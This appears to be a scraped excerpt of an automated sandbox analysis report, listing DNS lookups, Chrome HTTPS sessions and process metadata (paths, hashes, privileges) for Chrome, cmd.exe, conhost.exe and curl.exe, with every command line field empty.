Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | jsdelivr.map.fastly.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.193.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.129.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.65.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.1.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:30.186463118 CET | 1.1.1.1 | 192.168.2.6 | 0x12e1 | No error (0) | 172.217.165.142 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:30.692590952 CET | 1.1.1.1 | 192.168.2.6 | 0xc715 | No error (0) | 142.251.40.142 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:43.109517097 CET | 1.1.1.1 | 192.168.2.6 | 0xf02b | No error (0) | 208.80.154.240 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:43.569705009 CET | 1.1.1.1 | 192.168.2.6 | 0x6512 | No error (0) | 44.203.127.19 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:43.698257923 CET | 1.1.1.1 | 192.168.2.6 | 0x6ad0 | No error (0) | 208.80.154.240 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:56.478513002 CET | 1.1.1.1 | 192.168.2.6 | 0x916e | No error (0) | 44.203.127.19 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:45:32.533251047 CET | 1.1.1.1 | 192.168.2.6 | 0x7350 | No error (0) | 142.251.40.238 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:45:32.535382032 CET | 1.1.1.1 | 192.168.2.6 | 0xf418 | No error (0) | 65 | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.6 | 49701 | 44.203.127.19 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:29 UTC | 711 | OUT | |
2025-03-21 17:44:29 UTC | 247 | IN | |
2025-03-21 17:44:29 UTC | 16137 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:30 UTC | 16384 | IN | |
2025-03-21 17:44:30 UTC | 16384 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.6 | 49706 | 151.101.193.229 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:30 UTC | 623 | OUT | |
2025-03-21 17:44:30 UTC | 755 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.6 | 49707 | 151.101.193.229 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:30 UTC | 608 | OUT | |
2025-03-21 17:44:30 UTC | 770 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 536 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.6 | 49709 | 172.217.165.142 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:30 UTC | 708 | OUT | |
2025-03-21 17:44:30 UTC | 831 | IN | |
2025-03-21 17:44:30 UTC | 389 | IN | |
2025-03-21 17:44:30 UTC | 1220 | IN | |
2025-03-21 17:44:30 UTC | 1220 | IN | |
2025-03-21 17:44:30 UTC | 1220 | IN | |
2025-03-21 17:44:30 UTC | 855 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 2 |
Start time: | 13:44:16 |
Start date: | 21/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 3 |
Start time: | 13:44:22 |
Start date: | 21/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 12 |
Start time: | 13:44:27 |
Start date: | 21/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 14 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2a0000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 15 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68dae0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 16 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2a0000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 17 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\SysWOW64\curl.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfb0000 |
File size: | 470'528 bytes |
MD5 hash: | 44E5BAEEE864F1E9EDBE3986246AB37A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |